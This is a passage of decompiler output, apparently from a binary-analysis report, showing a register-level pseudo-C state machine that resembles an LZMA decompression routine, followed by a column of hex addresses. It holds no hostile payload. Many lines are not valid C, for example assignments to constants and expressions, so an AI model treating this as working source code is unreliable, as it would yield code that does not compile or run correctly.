								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                                                                        0x00000000
                                                                                                        0x0040647d
                                                                                                        0x0040647d
                                                                                                        0x00406481
                                                                                                        0x00406538
                                                                                                        0x0040653b
                                                                                                        0x00406547
                                                                                                        0x00406428
                                                                                                        0x00406428
                                                                                                        0x0040642b
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x004067a0
                                                                                                        0x004067a0
                                                                                                        0x004067a6
                                                                                                        0x004067ac
                                                                                                        0x004067b2
                                                                                                        0x004067cc
                                                                                                        0x004067cf
                                                                                                        0x004067d5
                                                                                                        0x004067e0
                                                                                                        0x004067e2
                                                                                                        0x004067b4
                                                                                                        0x004067b4
                                                                                                        0x004067c3
                                                                                                        0x004067c7
                                                                                                        0x004067c7
                                                                                                        0x004067ec
                                                                                                        0x00406813
                                                                                                        0x00406813
                                                                                                        0x00406819
                                                                                                        0x00406819
                                                                                                        0x00000000
                                                                                                        0x004067ee
                                                                                                        0x004067ee
                                                                                                        0x004067f2
                                                                                                        0x004069a1
                                                                                                        0x00000000
                                                                                                        0x004069a1
                                                                                                        0x004067fe
                                                                                                        0x00406805
                                                                                                        0x0040680d
                                                                                                        0x00406810
                                                                                                        0x00000000
                                                                                                        0x00406810
                                                                                                        0x00406487
                                                                                                        0x0040648b
                                                                                                        0x004069cc
                                                                                                        0x004069cc
                                                                                                        0x004069cf
                                                                                                        0x004069d3
                                                                                                        0x004069d3
                                                                                                        0x00406491
                                                                                                        0x00406497
                                                                                                        0x0040649a
                                                                                                        0x0040649e
                                                                                                        0x004064a1
                                                                                                        0x004064a5
                                                                                                        0x0040696b
                                                                                                        0x004069b7
                                                                                                        0x004069bf
                                                                                                        0x004069c6
                                                                                                        0x004069c8
                                                                                                        0x00000000
                                                                                                        0x004069c8
                                                                                                        0x004064ab
                                                                                                        0x004064ae
                                                                                                        0x004064b4
                                                                                                        0x004064b6
                                                                                                        0x004064b6
                                                                                                        0x004064b9
                                                                                                        0x004064bc
